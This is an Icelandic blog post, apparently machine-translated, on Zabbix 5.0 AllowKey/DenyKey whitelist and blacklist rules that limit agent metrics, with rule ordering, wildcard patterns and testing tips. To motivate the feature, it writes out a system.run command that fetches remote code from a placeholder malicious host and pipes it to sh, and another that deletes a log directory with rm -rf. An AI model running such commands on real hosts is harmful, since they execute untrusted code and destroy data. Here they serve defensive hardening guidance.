ProHoster > Blog > Stjórnsýsla > Stuðningur á svörtum lista og hvítlista fyrir mælikvarða á umboðsaðila í Zabbix 5.0

Stuðningur á svörtum lista og hvítlista fyrir mælikvarða á umboðsaðila í Zabbix 5.0

Stuðningur á svörtum lista og hvítlista fyrir mælikvarða á umboðsaðila í Zabbix 5.0

Stuðningur við svartan lista og hvítlista fyrir mælikvarða á umboðsaðila

Tikhon Uskov, samþættingarverkfræðingur, Zabbix

Gagnaöryggisvandamál

Zabbix 5.0 er með nýjan eiginleika sem gerir þér kleift að bæta öryggi í kerfum sem nota Zabbix Agent og kemur í stað gömlu færibreytunnar Virkja fjarskipanir.

Umbætur á öryggi kerfa sem byggja á umboðsmönnum stafar af því að umboðsmaður getur framkvæmt fjölda hugsanlegra hættulegra aðgerða.

  • Umboðsmaðurinn getur safnað nánast hvaða upplýsingum sem er, þar með talið trúnaðarupplýsingar eða hugsanlega hættulegar upplýsingar, úr stillingarskrám, annálaskrám, lykilorðaskrám eða öðrum skrám.

Til dæmis, með því að nota zabbix_get tólið geturðu fengið aðgang að lista yfir notendur, heimaskrár þeirra, lykilorðsskrár osfrv.

Stuðningur á svörtum lista og hvítlista fyrir mælikvarða á umboðsaðila í Zabbix 5.0

Aðgangur að gögnum með zabbix_get tólinu

ATH. Gögn er aðeins hægt að sækja ef umboðsmaður hefur lesheimildir á samsvarandi skrá. En til dæmis skráin /etc/passwd/ læsileg fyrir alla notendur.

  • Umboðsmaðurinn getur einnig framkvæmt hugsanlega hættulegar skipanir. Til dæmis, takki *system.run[]** gerir þér kleift að framkvæma allar fjarskipanir á nethnútum, þar á meðal að keyra forskriftir úr Zabbix vefviðmótinu sem einnig framkvæma skipanir á umboðsaðilanum. 

# zabbix_get -s my.prod.host -k system.run["wget http://malicious_source -O- | sh"]

# zabbix_get -s my.prod.host -k system.run["rm -rf /var/log/applog/"]

  • Á Linux keyrir umboðsmaðurinn sjálfgefið án rótarréttinda, en á Windows keyrir hann sem þjónusta sem System og hefur ótakmarkaðan aðgang að skráarkerfinu. Í samræmi við það, ef engar breytingar eru gerðar á færibreytum Zabbix Agent eftir uppsetningu, hefur umboðsmaðurinn aðgang að skránni, skráarkerfinu og getur framkvæmt WMI fyrirspurnir.

Í fyrri útgáfum breytu EnableRemoteCommands=0 aðeins leyfilegt að slökkva á mælingum með lyklinum *system.run[]** og keyrandi forskriftir úr vefviðmótinu, en það var engin leið til að takmarka aðgang að einstökum skrám, leyfa eða slökkva á einstökum lyklum sem voru settir upp með umboðsmanninum, eða takmarka notkun einstakra breytu.

Stuðningur á svörtum lista og hvítlista fyrir mælikvarða á umboðsaðila í Zabbix 5.0

Notkun EnableRemoteCommand færibreytunnar í fyrri útgáfum af Zabbix

AllowKey/DenyKey

Zabbix 5.0 hjálpar til við að vernda gegn slíkum óviðkomandi aðgangi með því að bjóða upp á hvítlista og svarta lista til að leyfa og hafna mælingum umboðsaðila.

Í Zabbix 5.0 eru allir lyklar, þar á meðal *system.run[]** eru virkjuð og tveimur nýjum stillingum umboðsmanns hefur verið bætt við:

AllowKey= — leyfilegt eftirlit;

DenyKey= — bönnuð eftirlit;

hvar er lykilnafnamynstur með færibreytum sem notar metastafi (*).

AllowKey og DenyKey takkarnir gera þér kleift að leyfa eða hafna einstökum mæligildum byggðar á ákveðnu mynstri. Ólíkt öðrum stillingarbreytum er fjöldi AllowKey/DenyKey færibreyta ekki takmarkaður. Þetta gerir þér kleift að skilgreina nákvæmlega hvað umboðsmaðurinn getur gert í kerfinu með því að búa til tré af ávísunum - keyranlegir lyklar, þar sem röðin sem þeir eru skrifaðir í gegnir mjög mikilvægu hlutverki.

Röð reglna

Reglurnar eru athugaðar í þeirri röð sem þær eru færðar inn í stillingarskrána. Lykillinn er athugaður samkvæmt reglum fyrir fyrstu samsvörun og um leið og lykill gagnaeiningarinnar passar við mynstrið er honum leyft eða hafnað. Eftir þetta hættir regluskoðun og lyklarnir sem eftir eru eru hunsaðir.

Þess vegna, ef þáttur passar við bæði leyfi og neita reglu, mun niðurstaðan ráðast af því hvaða regla er fyrst í stillingarskránni.

Stuðningur á svörtum lista og hvítlista fyrir mælikvarða á umboðsaðila í Zabbix 5.0

2 mismunandi reglur með sama mynstri og lykli vfs.file.size[/tmp/file]

Röð þess að nota AllowKey/DenyKey lyklana:

  1. nákvæmar reglur,
  2. almennar reglur,
  3. bannregla.

Til dæmis, ef þú þarft aðgang að skrám í tiltekinni möppu, verður þú fyrst að leyfa aðgang að þeim og hafna síðan öllu öðru sem fellur ekki undir settar heimildir. Ef neitunarreglan er notuð fyrst verður aðgangi að möppunni hafnað.

Stuðningur á svörtum lista og hvítlista fyrir mælikvarða á umboðsaðila í Zabbix 5.0

Rétt röð

Ef þú þarft að leyfa 2 tólum að keyra í gegnum *system.run[]**, og neitunarreglan verður tilgreind fyrst, verða tólin ekki ræst, vegna þess að fyrsta mynstur mun alltaf passa við hvaða lykla sem er, og síðari reglur verða hunsaðar.

Stuðningur á svörtum lista og hvítlista fyrir mælikvarða á umboðsaðila í Zabbix 5.0

Röng röð

Mynstur

Grundvallarreglum

Mynstur er tjáning með jokertáknum. Metstafurinn (*) passar við hvaða fjölda stafa sem er á ákveðnum stað. Hægt er að nota metastafi bæði í lykilheiti og í færibreytum. Til dæmis geturðu nákvæmlega skilgreint fyrstu færibreytuna með texta, og tilgreindu síðari sem jokertákn.

Færibreytur verða að vera innan hornklofa [].

  • system.run[* - rangt
  • vfs.file*.txt] - rangt
  • vfs.file.*[*] - rétt

Dæmi um notkun algildisstafs.

  1. Í lykilheiti og í færibreytu. Í þessu tilviki samsvarar lykillinn ekki svipuðum lykli sem inniheldur ekki færibreytu, þar sem í mynstrinu gáfum við til kynna að við viljum fá ákveðna endi á lykilheitinu og ákveðið sett af breytum.
  2. Ef mynstrið notar ekki hornklofa leyfir mynstrið alla lykla sem ekki innihalda færibreytur og neitar öllum lyklum sem innihalda tilgreinda færibreytu.
  3. Ef lykillinn er skrifaður að fullu og færibreyturnar eru tilgreindar sem jokertákn mun hann passa við hvaða svipaðan lykil sem er með hvaða færibreytum sem er og mun ekki passa við lykilinn án hornklofa, þ.e.a.s. það verður leyft eða hafnað.

Stuðningur á svörtum lista og hvítlista fyrir mælikvarða á umboðsaðila í Zabbix 5.0

Reglur um að fylla út færibreytur.

  • Ef ætlunin er að nota lykil með færibreytum þarf að tilgreina færibreyturnar í stillingarskránni. Tilgreina verður færibreytur sem metastaf. Nauðsynlegt er að meina vandlega aðgang að hvaða skrá sem er og taka með í reikninginn hvaða upplýsingar mælikvarðinn getur veitt með mismunandi stafsetningu - með og án breytu.

Stuðningur á svörtum lista og hvítlista fyrir mælikvarða á umboðsaðila í Zabbix 5.0

Eiginleikar þess að skrifa lykla með breytum

  • Ef lykill er tilgreindur með færibreytum, en færibreyturnar eru valfrjálsar og tilgreindar sem myndstafur, verður lykill án breytu leystur. Til dæmis, ef þú vilt slökkva á móttöku upplýsinga um álag á CPU og tilgreina að system.cpu.load[*] lykillinn eigi að vera óvirkur, ekki gleyma því að lykillinn án breytu mun skila meðalhleðslugildinu.

Stuðningur á svörtum lista og hvítlista fyrir mælikvarða á umboðsaðila í Zabbix 5.0

Reglur um að fylla út færibreytur

Skýringar

aðlögun

  • Sumum reglum getur notandinn ekki breytt, til dæmis uppgötvunarreglum eða sjálfvirkri skráningu umboðsmanns. AllowKey/DenyKey reglur hafa ekki áhrif á eftirfarandi færibreytur:
    - HostnameItem
    - HostMetadataItem
    - HostInterfaceItem

ATH. Ef stjórnandi gerir lykil óvirkan, þegar spurt er, veitir Zabbix ekki upplýsingar um hvers vegna mæligildið eða lykillinn fellur í ' flokkinnEKKI STUTT'. Upplýsingar um bönn við að framkvæma fjarskipanir eru heldur ekki birtar í umboðsskrám. Þetta er af öryggisástæðum, en getur flækt villuleit ef mælikvarðar falla í óstuddan flokk af einhverjum ástæðum.

  • Þú ættir ekki að treysta á neina sérstaka röð til að tengja utanaðkomandi stillingarskrár (til dæmis í stafrófsröð).

Skipanalínutæki

Eftir að reglurnar eru settar upp þarftu að ganga úr skugga um að allt sé rétt stillt.

Þú getur notað einn af þremur valkostum:

  • Bættu mælistiku við Zabbix.
  • Prófaðu með zabbix_agentd. Zabbix umboðsmaður með valmöguleika -prenta (-p) sýnir alla lykla (sem eru leyfðir sjálfgefið) nema þá sem ekki eru leyfðir af stillingunum. Og með möguleikanum -próf ​​(-t) því að bannaður lykill kemur aftur 'Óstuddur atriðislykill'.
  • Prófaðu með zabbix_get. Gagnsemi zabbix_get með valmöguleika -k kem aftur 'ZBX_NOTSUPPORTED: Óþekkt mæligildi'.

Leyfa eða neita

Þú getur neitað aðgangi að skrá og staðfest, til dæmis, með því að nota tólið zabbix_getað aðgangi að skránni sé hafnað.

Stuðningur á svörtum lista og hvítlista fyrir mælikvarða á umboðsaðila í Zabbix 5.0

**

ATH. Tilvitnanir í færibreytu eru hunsaðar.

Í þessu tilviki gæti aðgangur að slíkri skrá verið leyfður um aðra leið. Til dæmis ef táknmynd leiðir til þess.

Stuðningur á svörtum lista og hvítlista fyrir mælikvarða á umboðsaðila í Zabbix 5.0

Mælt er með því að athuga ýmsa möguleika við beitingu tilgreindra reglna og einnig taka tillit til möguleika á að sniðganga bönnin.

Spurningar og svör

Spurning. Hvers vegna var svona flókið mynstur með eigin tungumáli valið til að lýsa reglum, heimildum og bönnum? Af hverju var ekki hægt að nota til dæmis reglulegu orðtökin sem Zabbix notar?

Svara. Þetta er regex frammistöðuvandamál þar sem það er venjulega aðeins einn umboðsmaður og hann athugar gríðarlegan fjölda mælikvarða. Regex er frekar þung aðgerð og við getum ekki athugað þúsundir mælikvarða með þessum hætti. Wildcards - alhliða, mikið notuð og einföld lausn.

Spurning. Eru Include skrárnar ekki með í stafrófsröð?

Svara. Eftir því sem ég best veit er nánast ómögulegt að spá fyrir um í hvaða röð reglum verður beitt ef þú dreifir reglunum á mismunandi skrár. Ég mæli með því að safna öllum AllowKey/DenyKey reglum í eina Include skrá, vegna þess að þær hafa samskipti sín á milli, og innihalda þessa skrá.

Spurning. Í Zabbix 5.0 valkosturinn 'EnableRemoteCommands=' vantar í stillingarskrána og aðeins AllowKey/DenyKey eru tiltækar?

Svaraðu. Já það er rétt.

Svara með tilvísun!

Heimild: www.habr.com

Bæta við athugasemd